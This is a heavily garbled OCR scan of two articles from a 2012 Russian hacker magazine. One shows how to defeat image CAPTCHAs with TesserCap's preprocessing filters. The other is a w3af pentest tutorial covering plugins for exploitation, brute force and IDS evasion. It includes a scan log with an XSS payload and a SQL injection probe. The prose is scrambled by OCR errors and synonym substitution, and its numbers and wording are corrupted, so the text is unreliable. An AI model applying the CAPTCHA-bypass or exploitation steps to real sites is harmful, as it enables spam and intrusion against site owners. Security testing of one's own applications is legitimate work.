
URL-aдpec принуждён вытекать переадресации

происходит:

cavenue.com

>80%

на получения изображения, нужно выбрать эту опцию.

Ну равно осталась последняя опция, вклю­

чающая/отключающая уловка предвари­ тельной обработки изображений, который мы рассмотрим далее. По умолчанию предварительная пропуск изображений отключена. Пользователи поначалу настраи­ вают фильтры предварительной обработ-

for(each pixel in

САРТСНА)

компоненты для того всех пикселей изображения.

{

Каждое числовое край может охватывать

if (invertRed is true) new red=255 - current red if (invertBlue is true) new Ыuе=255 - current Ыuе if ( inve r tGree n is true) new green=255 - current green

компонентов каждого пикселя во зависимости от значения на фон выполняются следующие

действия:

0.

САРТСНА-изображениям равным образом впоследствии активируют загружаемые затем включения опции ЕпаЫе

lmage

Pгepгocessiпg, проходят предвари­

Если сила одинаково

-1, годный

цветовой схема никак не меняе т ся.

ки изображений в согласии тестируемым этот узел . Все СА РТ СНА-изображения,

057

lот -1 по 0551 возможных значений. Для RGВ­

0.

Если авторитет безвыгодный так же

-1,

целое найденные

компоненты указанного цвета !красный, зе­

Инверсия одного сиречь нескольких цветов

леный alias синий] меняю т ся на соответствии

неоднократно открывает новые внутренние резервы на про­

веркитестируемого САРТСНА-изображения.

вместе с введенным на полина значением. Значение О удаляет компонент, значимость

тельную обработку да поуже поэтому передаются в ОСR-систему Tesseгact про извлечения

Этап

0. Изменение

цвета

текста.

На данном шаге не грех внести изменения цветовые

055 устанав­

ливает его максимальную напряженность

да т. д.

Этап

0. Градация

серого !Шкала яркости)

На третьем буква п е безвыездно изображения конверти ­ руются во изображения на градациях серого . Это Chop"""' O Activ.ste

01 <· 0 t~

единый неизбежный каста п п реобразо ­ вания изображений, ко т орый н ельзя про­ пустить. В зависимости через выбранной кнопки выполняется одно изо следующих действий, связанных со цветовой составляющей каждого пикселя:

Aveгage -71Red + Gгееп + Bluel/3 . 2. Humaп -7 00.21 • Red + 0.71 • Gгееп + 0.07 • Bluel . 3. Aveгage of minimum апd maximum соlог componeпts -?IMiпimum IRed + Gгееп + Blue) + Maximum IRed + Gгееп + Blue ll /2 . 4. Miпimum -7 Miпimum IRed + Gгeen + Bluel. 5. Maximum -7 Maximum IRed + Gгееп + Bluel.

0.

В зависимости с интенсивности равным образом рас­

пределения цветовой составляющей САРТСНА любой с сих филыров может улучшить @ Smooth Mack 0

0

Q S~M~2

Q S~~M~2

Sh.vpen Ммk 0

0

извлекаемое лик пользу кого дальнейшей

Sharpen Ммk З

Q S~M~S

0

обработки . Этап

0.

Сглаживание равно стремительность

Чтобы запутать получение текста И з мен е ни е соответственно м ех присутствие изменении различны х д равным образом апазонов цветового з начения 14 ко сел ей во сторону белого сиречь черного

с САРТСНА-изображе н ий, на них д обавляют

Х АКЕР

03 /158/2012


П рове р ка нате п ро чн ос ть

грохот на форме однопиксельных иначе многопик­

выдается просчет равно накладка невыгодный около меняе т ся.

Этап

сельных точек, посторонних линий равным образом пре­

П ри выборе фиксированной маски кнопку

Это т гадость льт р строит г рафик з а висимости з н аче­

етранетвенных искажений . При сглаживании

Save Mask

пускать в дело невыгодный требуется.

0. Вводим

Этап

фильтры

Н а этом этапе обработки изображения е г в отношении

Passes

Cutoff.

В числовом луг

нелишне указать, как долго разок нужно

ния уров н ваш покорный слуга неярко г что до что до т частоты

(cutoff) встречаемос т равно

работы в отношении т секаю щ его фу! льт ра п оказа н ни а

устранения которого затем используются

или — или

Настройка отсечения

равным образом предлагае т выбрат ь срубание . П ри нц равным образом п

изображения возрастает непредвиденный шум, к

Bucket

0.

оттенки серого

во п посевная кампания д очес д е :

пиксели могут являться окрашены на объёмистый

приложить с~ответствующую маску изобра­

охват оттенков серого. Этот фильтр ото­

жения хуй переходом для нижеупомянутый этап.

бражает раздача градаций серого

Давай рассмотрим компоненты фильтра пользу кого

на

сглаживания равным образом повышения резкости. Доступ­

пикселей, окрашенных на оттенки серого

ны неуд в виде масок изображения:

на диапазоне ото О перед

00 баке т ахти [Ьuсkеt)/диапазонах. П ро ц ен т 12,

указан на ба кете О,

if (pi xe l 's gr ays cal e value <=Cutoff ) pixel graysca l e val ue=( е OR 055) - > на зави от им что касается сти, что касается т т по части го вроде а ваш покорный слуга опция выбра н а (<=и ли=> : Set Every Pi xel with valu e <=/=> Th r eshold t o е. Rema i ning t o 055 )

Фиксированные маски. По умолчанию

доход пикселей, окрашенных на что до тт енки

TesseгCap имеет цифра как никогда популяр­

бездарно г по отношению на диапазоне с

ных масок изображения. Эти маски могут

смягчать икона не так — не то обогащать

с следующих действий в целях каждого диа­

ние пикселей САР Т С Н А в соответствии с цвета м да п омо г ае т

невежливость [преобразование Лапласа). Из­

пазона значений, соо т ветствующих оттенкам

уничтожить п омехи не без; через отсе ч ения з н а ч е­

менения отображаются разом но за вы­

серого:

ний уро вн моя персона серого .

бора маски вместе с через соответствующих

0. Остави т ь лишенный чего измене н ия [Leave As ls). 2. Заменить белым [White). 3. Заменить черным [Biack).

Этап

кнопок.

Пользовательские маски изображения.

03

впредь до

05,-

во ба кете

т. д. Пользователь может удосужиться одно

0: Обтесывание (choppiпg)

После применения от глаживаю щ е г о, отсекаю­

ще г о,

Юзертакже может настроить пользова­ тельские маски обработки изображений,

График показывает п по части д роб н ое рас пр е д е л е ­

Бла г одаря сим оп ц иям дозволительно контроли­

bucket-

равно д ругих фуй л ьтро во САР Т С Н А ­

изображе н ия всё е щ е могут уклад жизни ь ради ш у м ле н ы

вводя значения во числовые полина да нажи­

ровать небо и земля диапазоны оттенков се­

однопиксельными либо бесчисленно п иксе л ьными

мая кнопку

рого, а равным образом сокращать/удалять шум, меняя

точками, посторонними линиями равным образом п реетран ­

оттенки серого на сторону белого или — или черного.

етвенными искажениями . П рин ц да п рабо т ы

Save Mask . Если

совокупность коэф­

фициентов во сих окошках в меньшей мере нуля,

' J •' '. /

МИНЗДРАВСОЦРАЗВИТИЯ РОССИИ ПРЕДУПРЕЖДАЕТ:

КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ


PCZONE РАСПОЗНАЕМ КАПЧИ

фильтра обтесывания зак л ючается во следую­

меняет его роль уровня серого новым,

щем: ежели часть смежных пикселей,

равно как показано далее на псевдокоде. Инверсия

окрашенных на установленный тонкое различие серого, мен ь ше

серого проводится про подгонки изображе­

этой утилиты, равным образом в настоящий момент удовлетворительно было бы про­

величины во числовом поле, фильтр обтесы на а­

ния подина ц на етовые настройки ОСR-системы.

пробовать какую-нибудь капчу получай прочность.

ния п чалтык во аивает им з н аче н ие О [ ч ерный ! не так — не то

055 [белый! п в рассуждении во ыбору п насчёт л ьзователя. П ри э т ом САР Т С Н А анализируется по образу во горизонталь­ ном, беспричинно равным образом во вертикал ь ном направлении.

Ну зачем ж, пожалуй, да мы от тобой рассмотрели по сию пору опции

Предлагаю для того примера одолжить болона говорят xakep.гu.

for(eac h pi xel i n САРТ С НА ) new grayscale value=255 - current graysc al e value

Итак, запускаем утилиту равно пошлепали получи сайт журнала . Видим каталог свежих новостей, за­ ходим на первую попавшуюся равно пролистываем

поперед места, идеже позволено отбросить родной коммента­ Этап

0: Изменение

ширины габариты .

Этап

00: Проверка

распознавания капчи

рий. Ага, коммент приближенно без затей никак не наболтать [еще бы, а в таком случае бы издавна еще всё эаспамилиl- нужно

Как у тв ерж д ает составитель ути л равным образом т ы, на ходе

Цель данного этапа - послать предвари­

п ерво н ачаль н ых равно сс л е д ова н ий равно разра­

тель н в рассуждении обработанное САРТС Н А-изображение

инъекцировать капчу. Н у что-нибудь ж, проверим, позволяется

ботки TesseгCap спирт часто отмечал,

ОСR-системе на распознавания. Кнопка

ли сие автоматизировать . Копируем

что, при случае САРТСНА-изображения имеют

Solve

беретка рисунок в дальнейшем фильтра

URL

картинки да вставляем его на адресную строку

толстую граничную линию да ее цветение отлича ­

инверсии серого, отправляет во ОСR-систему

TesseгCap . Указываем, что такое? нужно навалить

ется ото основного фона САРТСНА, кое-какие

пользу кого извлечения текста равно отображает воз­

капч, равно нажимаем Staгt . Программа без слова

вращенный экспликация во графическом интер­

загрузила

Д анный фильтр п редназ н ачен с целью обрабо т ки

системы

фейсе. Если угаданный подтекстовка совпадает

познать. К сожалению, однако капчи оказались

OCR

неграмотный могут рас п ознать текст.

02

02

картинок равно попыталась их рас­

граничных линий да их изменения. Граничные

из текстом для капче, значит, наш брат по правилам

либо невыгодный распознаны, насчёт нежели свидетельствует

абрис из шириной, которая указана во число­

задали фильтр интересах предварительной об­

вывеска

вом поле, окрашиваются во темнокожий сиречь мел

работки. Теперь позволительно перескочить держи вкладку

неправильно. В общем, неудивительно, в такой мере

в области выбору пользователя.

опций да привнести опцию предварительной

во вкусе посторонние шумы равно искажения безграмотный были

обработки [ЕnаЫе

удалены. Этим да мы со тобой не откладывая равным образом займемся . Жмем

Этап

0: Инверсия

серого оттенка

Это т фу-ты л ьтр п роходит каж ды й пиксель равно начинать

lmage Pгepгocessiпgl к

-Failed-

подина ними, либо распознаны

обработки всех последующих загруженных

правой кнопкой мыши получи и распишись одну изо

капч.

женных картинок да отправляем ее во систему

02

загру­

МИНЗДРАВСОЦРАЗВИ1ИЯ РОССИИ ПР~ДУ


Пр оверка получи пр что касается чн отросток

nредварительной обработки

[Send То lmage

Ргергосеssог]. Внимательно рассмотрев по сию пору

ЗАКЛЮЧЕНИЕ

В конечном итоге, на правах ваш покорнейший слуга ни бился, естественно

САРТСНА - изображения являются одним

признать болона говорят у меня беспричинно равно неграмотный получилось .

изо самых эффективных механизмов согласно защите

ры, потому айда бери вкладку опций равно указы ­

Пришло сь производить опыты со pasteЬin.

веб -приложе ний с автоматизированного за­

ваем, сколько отождествлять нужно только лишь цифры

com,

[Сhагасtег

02

капч, видим , в чем дело? они содержат исключительно циф­

Это, равно как видишь, совер шенно неверно.

которые минуя проблем посчастливилось рас­

полнения форм. Однако слабые капчи смо г ут

Set; Numeгics]. Теп ерь можно п е реходить сверху вкладку lmage Pгepгocessing

познать. Но коли твоя милость окажешься уси дчивее

защити ть через случайных роботов равно безвыгодный устоят

равно терпеливее равным образом сумеешь выудить кор­

накануне целенаправленными попытками их

для того настройки фильтров. Сразу скажу, что-нибудь

ректное распознание капч со xakep.гu, ведь

решить. Как равным образом криптографические алгоритмы,

п касательно игравшись со первыми тремя фильтрами

приёмом заходи держи вкладку опций да включай

САРТСНА-изображения, тщательно проте­

[ << Инверсия цвета>>, <<Изме нение цвета >>,

пре дв арительную обработку изображений

стированные равным образом обес п ечи во ающие вас сокий уро­

<< Градация бесцветно г что касается » ] автор невыгодный увидел никакого по­

[ЕnаЫе

lmage Pгepгocessing]. Затем пере ходи

вень безопасности, являются самым лучшим

ложительного эффекта, посему оставил тама

для

и, кликнув нате Staгt, загружай свежую

способом защиты. На основе статистики,

всё объединение дефолту. Я выбрал маску

порцию капч, которые в эту пору будут пред­

которую привел компилятор программы, моя особа выбрал

варительно возделываться твоим филь­

на своих п роектов гeCaptcha равным образом буд у реко­

Smooth Mask

установил доля относительно ходов равным

Main

тром. П осле того, в качестве кого пакет отработает,

мендова ть ее во всем своим друзьям- симпатия ока ­

залась самой стойкой изо протес т ированных.

которых меньше, нужно поставить на О, а те,

послать ко всем чертям корректно/некорректно распознан­ ные капчи [кнопки Магk as Соггесt/Магk as l nCoггect] . С сего момента позволительно просма­

которых больше, на

тривать сво дн ую статистику в области распознава­

полуавтоматизированное урегулирование САРТС Н А.

нию из через

Через каждому свой

одному. Фильтр Gгayscale

buckets

мы пропустил

да перешел разом для настройке отсечения . Вы­ б рал вес

054

равным образом указал, сколько те пиксел и,

055.

Чтобы отделаться

насчёт т оставшихся точек, включил

chopping

да из­

Show Statistics . В

общем-то ,

В любом случае далеко не из тоит забы вать , почто во Сети есть нема ло сервисов, которые предлагают

API

твоя милость передаешь серви­

сие самобытный отзыв насчёт защищенности пирушка

су образ , а оный вследствие непродолжитель ­

фильтр подсоединять далеко не было смысла, оттого пишущий эти строки

другими словами прочий САРТСНА. Если достаточно дилемма об вы­

ное сезон нет слов звра щает урегулирование . Решает ка пч у

не без; разу нажал сверху

боре того не ведь — не то др угого решения, в таком случае от помо­

подлинный куверта [например, изо Китая ] , п о­

щью TesseгCap кардинально не возбраняется вести свое

лучая из-за сие свою копеечку. Ту т поуже несчастный

собственное тестирование.

защиты не имеется : ]. ::::к:

менил ширин у размер впредь до

00. Последний

Solve.

На капче у меня было число н в отношении пакет распознала его

014945, как 011435.

Содержание на дыме сигареты: смолы - 0; 0 мг, никотина- 0,4; 0, 0 мг, С О- 0; 0 мг

0Р~ЖДА~Т: КУР~НИ~ ВР~ДИТ ВАШ~МУ ЗДОРОВЬЮ


PCZONE

Тара не без; Иващен ко

loxdeflaoxdef.info] ·

~-

v

ФРЕИМВОРК

[!]·

для того веб-пентестера

·~

Ин форм ац да я пред ст авп е н а и от кл юч равным образом т ел ьно для насчёт з н ак касательно м ления .

Редакция отнюдь не нес е т отв е тственности

ТЕСТИРУЕМ БЕЗОПАСНОСТЬ ВЕБ-ПРИЛОЖЕНИЯ С ПОМОЩЬЮ WЗAF

из-за е е использование в прот да закачаешься з а для что касается н ны х

целя х. nодобные

-де йствия вл ек у т з а не без; об й уголовно е преследование .

Прое ко т wЗaf вместе с равно льно выделяется сред равно мног их други х инструм е нтов в целях ис не без; ледования

безопасности веб-приложени й. Это

безвыгодный обычны й скэнар со нетерпимо забитым функционалом , а фреймвор к, позволяющи й

равным образом спользовать больше сотни различных плагинов для исследования сайта, поиска уязвимасте й и их последующей эксплуатации . ЧТО ТАКОЕ WЗAF? Совреме н ные веб-приложе н равно пишущий эти строки ранее бедно нежели похожи н а своих п ред­ ш естве н нико на , ко т гам ы е бы л равным образом на передвижение у е щ е п моя особа т ь л ет н аза д . Они стано ­ вятся всё сильнее популярными, ис п ользуют много в большинстве случаев техно­ логий, ась? увеличивает выполнимый градиент атаки, обрабатывают всё больше разной информации, начиная финансовые да переанальные данные . Чтобы убавить риски, пишущий сии строки можем насадить процес от безоnас­ ной разработки п рограммна го обеспечения, важным эт апом которого является материал т иро во ание безопас н ости. Услов н насчёт говоря , не грех выде­ лить четное число ыре во ида тестиро во ания безопасности веб - приложения :

0. Автоматизированноесканированиенауязвимос т и. 2. Ручноетестированиебезопасностиlпентестин~ . 3. Статическийанализкода. 4. Аудит кода.

-

n

Сегодня аз многогрешный хочу рассказа т ь что до проекте wЗaf lwЗaf. oгg l . Это фреймворк !Web Applicatioп Attack and Audit F гamewoгkl , некоторый может бытовать исполь зова н для для тестирования бе зо пасности на еб-приложения

первых двух видов тестирования. Автором сего открытого проекта является Андреас Рианчо с Аргентины. Сейчас чтение разрабаты­ вается nреимущественно им равно малый гру nn ой контрибьюторов

со однако г что до мира, на ко т орую ход ит равно ав т гомон сих строк

,._ ~.ы. jNII'amtWI axllt

ним равным образом принимают активное отношение такие известные компании,

·-·""""""'

. ..... ..,"",_ Plugin

..

N:Jt.ie

-.

:1. В работе получи д

Thll ptugln 0nr:ts СIОМ 0118 SCI\ping (XSS) 'o'lllntl'.ьllllin.

вроде

TolndXSS~twpluglnwllstl'lda . . ofi81161C:11pttmoJD8\II!Yp61."....., andsнrctlforfllllnpulln . hlltlpCIIIИ. Тhepaiiiii'IМtr "~c:onev.nsltoepkqniOIIOAIIIO.Ifi~IOhwetlfC)pliedon 81'1d81h.,..;l, requnt .. P'Qt$4!CI'in~bflolqu:twrцnOtiOICII«ЬOttlminllhoWI'I\CII'I)'

~НinQS .,I иntlarmylr1к'ion~

~

Rapid7

да Я ндекс! Фреймворк написан держи

Python,

который, в качестве кого твоя милость

знаешь, является << языком со батарейками>>. Батарейки wЗ af- зто его расширения, которы х набралось поуже свыше сотни. Это, конечно, еще не

Mozilla

Fiгefox, да сделано хватит за глаза мощное система .

A" tfl'lliiRtOOtl r.1 <,« '*"IFilt

Q

.Z II.Я.

,_,

~ l!miFill

tМckSIONd

0:3

011111'A:18f01CМC~~s l 0

касательно

0 Oi

КАК УСТРОЕН WЗAF? Фреймворк wЗaf состоит изо двух важных частей: ядра да плагинов.

Главное отверстие wЗaf

Ядро запускает важнейший nроцесс равным образом координир ует работу плагинов ,

ХАКЕР

03/158/2012


Фреймворк про пенте не без; т паяц

,·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- - ·- ·- ·- ·- -, - · - · - · - · - · - · - · - · - · - · - ·,

: (Discivery)

для во еб -nрил оже нию да его ответах . Если что до nять пров yes ти аналогию

.

не без; сообща

(вrutforce) ~ : •

0

UNI X, сие в конечном счете эквива л ен ттекс т ово го nотокового sed, н относительно ужедля НТТР-транз акций. Заме ворса закачаешься всех от­

редактора

ветах hidd en -n oля получай обы чны етекстовые? П ожалуйс т а! Еvаsiоn -nлагины исnользуются для того обхо д а nростых nравил раз­

0.

личных 005. Хо чеш ь nодальше сохраняться незамече нным nр равным образом nр о­ ведении очередного nентеста веб -nр иложения? То гда исnользуй

что-нибудь изо сего набора.

0.

Оutрut-nлагины выn ол няют простую миссию: формируют на удо бо­ читаемом виде насчёт т четы насчёт результатах работы wЗaf. Вы бирай, что тебе сильнее nодходит-<<nравославныЙ >> текстовый конструкция т или — или

И нфо рмаци что касается нный nоток на wЗaf

<<э нтерn райз н ый>>

POF,-

или — или nо-быстрому наnиши паче nод­

похаживающий чтобы твоих нужд nлагин . а приближенно а обме н инфо рмации среди ними. Плаг ины, на со во ою очередь,

0.

Аuth-nлагины берут возьми себя круглый nроцесс уnравления nоль­

находятуязвимости да п озволяют пр оэкс пл уа тировать их. Ч ерез главное

зо во ательской сессией: авторизируются во веб-nриложении,

плагины обмениваются информацией, для прим еру, об найденн ых запро­

nроверяют, в надежде конференция оставалась давай отсюда дн ой, да выnолняют во

сах про фаззинга. В для аче со тве ц ентрального хранилища информации

конце сканирования любезный парад с веб-nриложения. Это

выст у паеттак называемая «б аза з наний >>.

по части ч е нь инструмент обно. Ещ ё со на сем н е давн по части далеко не б ыл что касается удоб н ой внутренние резервы

Слово «фрейм ворк >> на названии разработки у п отребляется никак не слу ­ чайно . WЗaf пр е д оста вля ет платформ у, во ведь промежуток времени как бы цельный функцио­

просмотреть nользовательские части веб-приложений, в таком случае есть ть те, зачем держи хо дятся после авторизацией. Да , допускается было обратить wЗaf

наличность к пентеста реализован во разных плагина х. Для каждого нового

исnользовать nредварит ельно nолученную да з браузера куку, н насчёт

ск анир ова ния твоя милость можешь баллотировать только лишь нужные тебе аддоны,

сие н е самый удило обный сnособ. Сейчас во составе wЗaf только одинокий

комбинируя их. Плагин каж дого типа, котор ы х на общей сложности на­

аuth -n лагин, однако возлюбленный nодойдёт с целью большинства случае в. Д а равным образом невыгодный

счи тываетс пишущий эти строки восемь, отвечает вслед устройство что касается пр е деленной следовать дач да .

забывай, ась? ты да я имеем д ело вместе с фреймворком, да дозволительно наnисать

0. Плагины для того поиска на холм можны хточек во хо истинно на пр иложение !или та ко

экий nлагин nрактически про какой приглянется сложение ауте нт ификации:

называемые disсоvегу-плагиныl собирают комплекция , ссылки равно общо

SMS, токены

да т.n . У тебя на руках все мощь Python!

всё, почто можетсгенерироватьзапрос для на еб- пр иложению. Та ким об­ ра зо м формируется меню запросовтестируемого приложения . Хо ­ рошим прим ерам та ко го плагина является образцовый веб-паук ,

Теnерь, эпизодически наша сестра никак не бессчетно разобрались вместе с архитектурой wЗaf, настало

скаются во период е, по причине ч ему цели , обнаруженные для пр е дыду­

пора у понимать его во д ействии. Сnециа льн относительно интересах д емо н из трации мы на­

щем этапе, п по отношению падают получи во хо д сих но плаг ино во бери следующем э тап е.

nисал nростое, да оче нь <<вебдва нольное >> nриложение социальной

Этотnроцесс nродолжаетеядатех п в рассуждении р, n ока отнюдь не достаточно д ос тигн ут

наnравленнос т равным образом nод названием ltte г. Да , сие сер на ис пользу кого ведения

лимит, общепринятый пользу кого режима nои ска цел ей чтобы фаззинга.

0. Аудит-nлагины исnользуютвывод nлаг инов !то кушать т фары входа в nриложениеl с целью n оиска у ваш покорнейший слуга з во равно мастей, котишка орые nозволяютосу­ щест витьтакие атаки, какХSS, SQL-инъекция, IR)LFI равно масса

микроблогов, равно , мы по-над еюс ь , симпатия ста н е ттаким но nоnулярным, наравне его

односторонний

040 символами в одно депеша стар ши й светильник т. :1

Те стовое веб-nриложение обладает следую щ ими свойс тв ами:

основано в

LAMP ILinux-Apache-M yS QL-PHPI;

имеетфункцию n оиска равно стервис nрив атных сообщений;

др у ги х.

З.

СКАНИРУЕМ ВЕБ-ПРИЛОЖЕНИЕ

реализованный на виде модуля webSpideг. Оisсоvег у -плагины после пу­

Gгер-nлагины nросты, так на как и времена очен ь nолезны, равно как равно изо во ест­

nолноценный достуn ко функционалу nриложения nредоставляется

ная UNI Х-ут илита , на потерять честь которой они получи и распишись з ваны . Смысл та кой: вследствие

всего-навсего заре гистрир ованным да авторизова нны м nользователям;

gг ер -nлагин nро хо диткаждая два НТТР -зап р ос/от вет, во которой nроизводится nоиск интересующей нате вместе с информации !номера

ядро н оис nоль зуетАJАХ;

кре дитны х карт, вн утренни е IР -ад р еса, а др еса элек тронн ой nочты

да т. n.l. Эти nлагины вдобавок умеют отыскивать учас тки nотенциально

имеет, сатана nобери, уязвимости!

ХОЛОДНЫЙ ЗАПУСК

onacнoгoJavaScгipt-кoдa, наnример :

Для азбука выкладывай nросканир уем наше веб-nриложение минус авториза­

document.write document.location eval

тр и, хотя сие n ока небольш ой сюрреализм nр из) да н терфейса:

ции- nросто натравим сверху него сканер. В wЗa f убирать двойка ! во ообще, ранее

gtkUi - графический, основанный получай тулките GTK; consoleUi - хакерекий Ul для того консольных старожи ловля !конечно же, со удобным автомобиль следовать вершением неподвижность нд) .

0.

П од об ны е участки стих то и дело создают nредnосылки в целях р еа­

Будем исnользова ть nервый изо них. Для заnуска GUI-версии на­

ли вслед за ции атак вида ООМ based XSS l www. owasp . oгg/ i ndex.php/

бираем на консо ли <<./wЗaf_gui>> равно видим кое-что nо хожее для изображен­

DOM Based XSS).

ное нате ск р иншоте

Вгu tеfо гсе- nлагины , вроде не грех возбуждать ся, nроизводят nеребор

nр офиль, цель, nлагины равно тулбар. Немн ого расскажу в отношении nрофилях.

значений с целью ме х анизмов аутентификации НТТР

0. Гл авное

пространство в один из дней д елено получи и распишись порядочно секций:

Basic равным образом чтобы обыч­

утнапиштим конституция к лаги держи . Наnример , nлагин foгmlogin автоматически L.

детектир уетформ ы во хо согласен в области сод е ржани ю во ни х двух nараметро в, о дин изо которых им еетти n passwoгd. По сле об наружи ния тако й

сложение приёмом начинается б р ут.

0.

Аttасk-nлагины nредназначены далеко не ради nоиска брешей, а для того их

экс пл уата ции. Они, равно как равно др угие аддоны, используютобщую базу знаний что до те ст ируемом nриложении, на ча со тности , они используют ин­ формацию насчёт найденныхуязвимастях равно пытаются их пр оэкс nл уати ­ ровать . Да-д а, прямо сии nлагины могутnомочьдобыть тайный

••

.......

..

-

..... .. ...._.

ш е лл получай бажном сервере. ;l

0.

Маnglе-nлаг равно ны nозв оляютнал ету заменять что-нибудь на после nро сах

ХАКЕР

03/158/2012

Структу р а во еб-nриложения

01,9


PCZONE

.

:::--CniМSiRSaiplngwMЬniC~JI'CГ. UJinO НПP 01181adGE1. f l'leS811diiiiW8S:

"limt=15&\PCSCIFТ~Н")<ISC<Pf .... ть. ml)(thcl'*-wuv Tnisdnt!abllotyateasAU.Ьrowsen.. Тtis.,._~...asloundO'INNCf,IИIWiflid!905.

. ... C/OIIIillla!IID/III~ • • c-•.er~p~orq...._.ы~o~r

.. .. ""&""'"".-- - - Результаты сканирования wЗaf

Использование прокси-утилиты на wЗaf

Как не грех догадаться, эт что до именованные наборы настроек, которые

Suite,

дозволительно находить применение на wЗaf. П относительно сути, сие in i-файлы, во которых твоя милость можешь

«nо льзовательские прокси>> позволяют на реальном времени об т слежи­

сберегать nолюбившуюся тебе конфигурацию wЗaf, во томишко числе те­

вать [и пусть даже изменять! НТТР-трафик среди веб-браузером равным образом веб­

стируемый

сервером. Конечно, такой же снасть питаться равным образом на комплекте wЗaf.

URL,

выбранные равным образом настроенные плагины, саге-настройки

равно многое другое. Например, про сканирования ltteг мы создал азбучная истина

alias хоть популярного аддона для Fiг efox - Таmрег

Data.

Такие

Вернее, такихпроксив нем аж две:

вид подина названием М у Pгofile, дальше подключил на нем disсоvегу­

disсоvегу-плагин spideгMan;

плагины webSpideг равным образом

диалоговый механизм lnteгcepting Ргоху к ручноготестиро­

gгер-плагинов для того

вания.

XSS-

pykto [порт знаменитого Nikto получи Pythonl, пару поиска DOM XSS равным образом серия плагинов к поиска

равно SQL-инъекций. Ч тобы сделать первые шаги сканирование, нажимаем Staгt

равным образом ждем мало-мальски минут, сей поры отнюдь не появятся первые результаты. Кста­ ти, да мы не без; тобой спокон века можем созерцать вслед за действиями wЗaf возьми вкладке

Log,

Для наших целей будем проэксплуатировать spideгMan, который, в духе ты да я

поуже разобрались, представляет на вывеску disсоvегу-плагин. П опробуем

гораздо на реальном времени выводятся информационные сведения

его во деле. П одключаем плагин во главном окне равно запускаем сканиро­

через ядра равно п лагинов. Ход процесса отображается при помощи прогреес - сидячка

вание. В веб-браузере на качестве пр окси прописываем

да оставшиеся идентификаторы.

[я использую чтобы сего адд симпатия F охуРгоху интересах F iгe f ox, за зво ля ющий

П ример н относительно сквозь

минут просматривание завершается. Посмотрим,

00

027.0.0.1:44444

свободно регулировать проксями равным образом отвлекаться меж ду ними! . SpideгMan

зачем посчастливилось выискать wЗaf. П омимо ошибок конфигурации Апача равно кучи

достаточно запущен перед webSpideг, где-то который крайний сможет проэксплуатировать

подозрений бери

его результаты . Переключившись для spideгMan во нашем браузере, н е­

DOM XSS, автосканер обнаружил серия XSSI Одна из них, во /i ndex.php, представляет к нас особенный интерес, осталь­ ные пишущий сии строки все еще отложим. Плагин Pykto, во свою очередь, обнаружил доступную страни цу статуса Apache равно phpinfo-cкpиnт /test.php. Другие плагины установили обозначение равно версию использ уемого веб-сервера

равно веб-фреймворка. В нашем случае сие

Linux

Apache/2.2.16 получи DeЬian GNU/

да метла программировани РНР. Др угая полезная фишка, которая

позволяет нам кризис миновал уяснить структуру веб-приложения,- сие вклад­

ка

URLs со древовидной

картой веб-приложения да ее графическим

представлением. Здесь но позволяется проюрдонить целое НТТР-транзакции, сгенер ированные во рамках сканирования.

ПЕНТЕСТИНГ ВЕБ

0.0

Сейчас поуже никого нет малограмотный удивишь играми, г рафическим редактором или видеозвонками помощью веб-браузер. Неотъемлем ой частью интернета стали веб-приложения, на которых логика выполнения запро граммирована для стороне клиента из активным использовани­

ем JavaScгipt,

AJAX, JSON, HTML5

да др угих названий да аббревиатур.

:1 Такой сильный ахиллесова пята технологий всё хлестче затрудняет автоматизированное проверка безопасности веб-приложений. Прошли былые времена. Это летопись сделано безвыгодный что касается тестировании

заурядно г по отношению веб-сайта от множеством страниц вида /aгticle.php?id=68, на ко т орых, на со вою насчёт ч е р е дь , вкушать масса ссылок , форм равным образом тому п одобного <<мяса>> в целях веб-паука. На жа на , что обычно, <Ctгi -U >,

в надежде п обзыркать НТМL-к касательно д , твоя милость увидишь слякоть изо огромного куска JavaScгipt равно крошку тра д иционно г что касается

HTML. П одобный

бездна полазаем в соответствии с тестируемому веб-приложению. В L оg-табе видим:

[Mon 00 Мау 0011 02:08:22 АМ MST] spiderMan proxy i s running on 027.0.0.1:44444. Please configure your browser to use these proxy settings and navigate the target sit e. То exit spiderMan plugin please navigate to http:l/127.7.7.7/spiderMan?terminate . [Mon 00 Мау 0011 02 :15 :29 АМ MST] The user is navigating through the spiderMan proxy. [Mon 00 Мау 0011 02:15 : 09 АМ М5Т] Trapped fuzzaЫe requests: [Mon 00 Мау 0011 02:15:29 АМ MST] http ://localhost /i ndex.php 1 Method : GET [Mon 00 Мау 0011 02:15:32 АМ MST] http://localhost/user-info. php 0 Method: GET [Mon 00 Мау 0011 02 : 02:36 АМ MST] SQL injection in а MySQL database was found at: "http://localhost/user-info.php" , using НТТР method GET. The sent data was: "id=d'z"0". Th is vulnerability was found in the request with id 0911. [Mon 00 Мау 0011 02 :27:10 АМ MST] Cross Site Scripting was found at: "http://localhost/index .php", using НТТР method GET . The sent data was: "limit=15&u=<ScRIPT> a=/UzmE/%0Aalert(a.source)</SCRiPT>" . The modified paramete r was "u" . This vulnerability affect s ALL browsers. This vu lne rabi lity was found in the request wit h id 0042.

«сайт» касательно ч ен ь

не раз малограмотный по части зубам веб -п ауку, построенному по части классической модели.

Как различимо изо лога, с намерением остановить работу spideгMan, необхо­

Это общий бог интересное тенденция интересах развития средств

димо перепрыгнуть нате особливый адрес, по прошествии аюшки? webSpideг да остальные

тестирования без шаг сности веб-приложений. Ведь непонятно, в качестве кого

плагины примутся из-за дело. Так , аудит-п лагины обнаружили

во экой ситуации автоматизированно давать огульно сайт - встраи­

да ХSS-инъекциюl П ервая дыра, оказавшаяся как бы однова во АJАХ-запросе,

вать полноценные

была упущена в миг первого сканирования.

JS

равным образом рендеринг-движки? Использовать подход,

Добавлю одну каплю оборона эксплуатацию найденных ба го на . WЗaf умеет

сходственный Selenium/Web Dг iveг? Дл моя персона тестирования п од обных приложений малограмотный быть без специализирован ны х прокси, т аких как бы

050

SQL-

OWASP WebScaгab

равно В uгр

в дугу сгибать иные перспективы уязвимастей и, ко примеру, может предоставить тебе заветн ы й шел л бери целевой машине. Для эксплуа-

ХАКЕР

03 /158/ 0012


Фреймворк д ля п ентестера

..

тацииобнаруженнойуязвимостинадопростоперетащитьсоотве~ ствующий эксплоит нате вкладке

Exploit

бери уязвимость. Д ля эксплуа­

тации SQL-инъекций используется безусловно не внове тебе

.

---........

РУЧНОЕ ТЕСТИРОВАНИЕ Отправить НТТР-заnрос на нормальной операционной системе дозволено

на конце концов,

-

sqlmap

